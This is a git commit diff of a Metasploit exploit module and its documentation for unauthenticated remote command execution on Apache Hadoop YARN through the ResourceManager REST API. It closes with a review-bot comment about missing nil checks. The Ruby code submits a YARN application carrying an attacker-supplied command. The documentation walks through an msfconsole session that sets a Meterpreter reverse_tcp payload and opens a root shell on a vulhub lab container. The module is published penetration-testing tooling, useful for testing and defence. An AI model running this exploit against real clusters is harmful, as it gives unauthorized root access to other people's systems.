parent
aa3fcea377
commit
50252c75d6
|
@ -1,21 +1,21 @@
|
|||
## Description
|
||||
## Description
|
||||
|
||||
This module exploits an unauthenticated command execution vulnerability in Apache Hadoop through ResourceManager REST API.
|
||||
|
||||
## Vulnerable Application
|
||||
## Vulnerable Application
|
||||
|
||||
**Vulnerable Application Link**
|
||||
**Vulnerable Application Link**
|
||||
|
||||
- docker
|
||||
- docker
|
||||
|
||||
https://github.com/vulhub/vulhub/tree/master/hadoop/unauthorized-yarn
|
||||
|
||||
## Vulnerable Application Installation Setup.
|
||||
|
||||
Change dictory to `vulhub/hadoop/unauthorized-yarn`, and run `docker-compose up -d`
|
||||
Change dictory to `vulhub/hadoop/unauthorized-yarn`, and run `docker-compose up -d`
|
||||
|
||||
|
||||
## Verification Steps
|
||||
## Verification Steps
|
||||
|
||||
Example steps in this format (is also in the PR):
|
||||
|
||||
|
@ -33,11 +33,11 @@ Change dictory to `vulhub/hadoop/unauthorized-yarn`, and run `docker-compose up
|
|||
9. You should get a shell.
|
||||
|
||||
|
||||
## Scenarios
|
||||
## Scenarios
|
||||
|
||||
```
|
||||
msf5 > use exploit/linux/http/hadoop_unauth_exec
|
||||
msf5 exploit(linux/http/hadoop_unauth_exec) > show options
|
||||
msf5 > use exploit/linux/http/hadoop_unauth_exec
|
||||
msf5 exploit(linux/http/hadoop_unauth_exec) > show options
|
||||
|
||||
Module options (exploit/linux/http/hadoop_unauth_exec):
|
||||
|
||||
|
@ -61,11 +61,11 @@ Exploit target:
|
|||
0 Automatic
|
||||
|
||||
|
||||
msf5 exploit(linux/http/hadoop_unauth_exec) > set rhost 192.168.77.141
|
||||
rhost => 192.168.77.141
|
||||
msf5 exploit(linux/http/hadoop_unauth_exec) > set rhost 192.168.77.141
|
||||
rhost => 192.168.77.141
|
||||
msf5 exploit(linux/http/hadoop_unauth_exec) > set payload linux/x86/meterpreter/reverse_tcp
|
||||
payload => linux/x86/meterpreter/reverse_tcp
|
||||
msf5 exploit(linux/http/hadoop_unauth_exec) > show options
|
||||
msf5 exploit(linux/http/hadoop_unauth_exec) > show options
|
||||
|
||||
Module options (exploit/linux/http/hadoop_unauth_exec):
|
||||
|
||||
|
@ -97,16 +97,16 @@ Exploit target:
|
|||
0 Automatic
|
||||
|
||||
|
||||
msf5 exploit(linux/http/hadoop_unauth_exec) > set lhost 192.168.77.141
|
||||
msf5 exploit(linux/http/hadoop_unauth_exec) > set lhost 192.168.77.141
|
||||
lhost => 192.168.77.141
|
||||
msf5 exploit(linux/http/hadoop_unauth_exec) > exploit
|
||||
msf5 exploit(linux/http/hadoop_unauth_exec) > exploit
|
||||
|
||||
[*] Started reverse TCP handler on 192.168.77.141:4444
|
||||
[*] Started reverse TCP handler on 192.168.77.141:4444
|
||||
[*] Sending Command
|
||||
[*] Command Stager progress - 100.00% done (763/763 bytes)
|
||||
[*] Sending stage (853256 bytes) to 172.20.0.3
|
||||
[*] Meterpreter session 1 opened (192.168.77.141:4444 -> 172.20.0.3:34138) at 2018-05-15 03:21:17 -0400
|
||||
|
||||
meterpreter > getuid
|
||||
meterpreter > getuid
|
||||
Server username: uid=0, gid=0, euid=0, egid=0
|
||||
```
|
||||
```
|
||||
|
|
|
@ -4,6 +4,7 @@
|
|||
##
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
|
@ -18,38 +19,35 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'cbmixx', # Proof of concept
|
||||
'Green-m <greenm.xxoo[at]gmail.com>' # Metasploit module
|
||||
'cbmixx', # Proof of concept
|
||||
'Green-m <greenm.xxoo[at]gmail.com>' # Metasploit module
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
[ 'URL', 'http://archive.hack.lu/2016/Wavestone%20-%20Hack.lu%202016%20-%20Hadoop%20safari%20-%20Hunting%20for%20vulnerabilities%20-%20v1.0.pdf'],
|
||||
[ 'URL', 'https://github.com/vulhub/vulhub/tree/master/hadoop/unauthorized-yarn']
|
||||
['URL', 'http://archive.hack.lu/2016/Wavestone%20-%20Hack.lu%202016%20-%20Hadoop%20safari%20-%20Hunting%20for%20vulnerabilities%20-%20v1.0.pdf'],
|
||||
['URL', 'https://github.com/vulhub/vulhub/tree/master/hadoop/unauthorized-yarn']
|
||||
],
|
||||
|
||||
'Platform' => 'linux',
|
||||
'Arch' => [ARCH_X86, ARCH_X64],
|
||||
'Targets' =>
|
||||
[
|
||||
['Automatic', {} ],
|
||||
['Automatic', {}]
|
||||
],
|
||||
'Privileged' => false,
|
||||
'DisclosureDate' => 'Oct 19 2016',
|
||||
'DefaultTarget' => 0
|
||||
))
|
||||
))
|
||||
|
||||
register_options([Opt::RPORT(8088)])
|
||||
end
|
||||
|
||||
|
||||
def check
|
||||
begin
|
||||
res = send_request_cgi(
|
||||
'uri' => normalize_uri(target_uri.path, '/ws/v1/cluster/apps/new-application'),
|
||||
'method' => 'POST'
|
||||
'uri' => normalize_uri(target_uri.path, '/ws/v1/cluster/apps/new-application'),
|
||||
'method' => 'POST'
|
||||
)
|
||||
|
||||
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionError => e
|
||||
rescue Rex::ConnectionError
|
||||
vprint_error("#{peer} - Connection failed")
|
||||
return CheckCode::Unknown
|
||||
end
|
||||
|
@ -68,26 +66,27 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
|
||||
def execute_command(cmd, opts = {})
|
||||
res = send_request_cgi(
|
||||
'uri' => normalize_uri(target_uri.path, '/ws/v1/cluster/apps/new-application'),
|
||||
'method' => 'POST'
|
||||
'uri' => normalize_uri(target_uri.path, '/ws/v1/cluster/apps/new-application'),
|
||||
'method' => 'POST'
|
||||
)
|
||||
|
||||
app_id = res.get_json_document['application-id']
|
||||
|
||||
post = {
|
||||
'application-id' => app_id,
|
||||
'application-name' => Rex::Text.rand_text_alpha_lower(4..12),
|
||||
'application-type' => 'YARN',
|
||||
'am-container-spec' => {
|
||||
'commands' => {'command' => cmd.to_s},
|
||||
'application-id' => app_id,
|
||||
'application-name' => Rex::Text.rand_text_alpha_lower(4..12),
|
||||
'application-type' => 'YARN',
|
||||
'am-container-spec' => {
|
||||
'commands' => {'command' => cmd.to_s}
|
||||
}
|
||||
}
|
||||
|
||||
res = send_request_cgi(
|
||||
'uri' => normalize_uri(target_uri.path, '/ws/v1/cluster/apps'),
|
||||
'method' => 'POST',
|
||||
'ctype' => 'application/json',
|
||||
'data' => post.to_json
|
||||
send_request_cgi(
|
||||
'uri' => normalize_uri(target_uri.path, '/ws/v1/cluster/apps'),
|
||||
'method' => 'POST',
|
||||
'ctype' => 'application/json',
|
||||
'data' => post.to_json
|
||||
)
|
||||
end
|
||||
|
||||
end
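Review bot: In `execute_command`, the line `app_id = res.get_json_document['application-id']` dereferences `res` without a nil check, and this commit leaves it as it was. `send_request_cgi` returns nil when the request times out, so a slow or unreachable ResourceManager ends in a NoMethodError instead of a reported failure. A guard before that line would cover it, for example `fail_with(Failure::Unreachable, "#{peer} - No response from ResourceManager") unless res`. The second `send_request_cgi` call also appears to lose its `res =` assignment in this change, so the submission's HTTP status is never inspected. A cluster that rejects the request, for instance because authentication is enabled, would then look the same as an accepted one in the module output.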
|
||||
|
|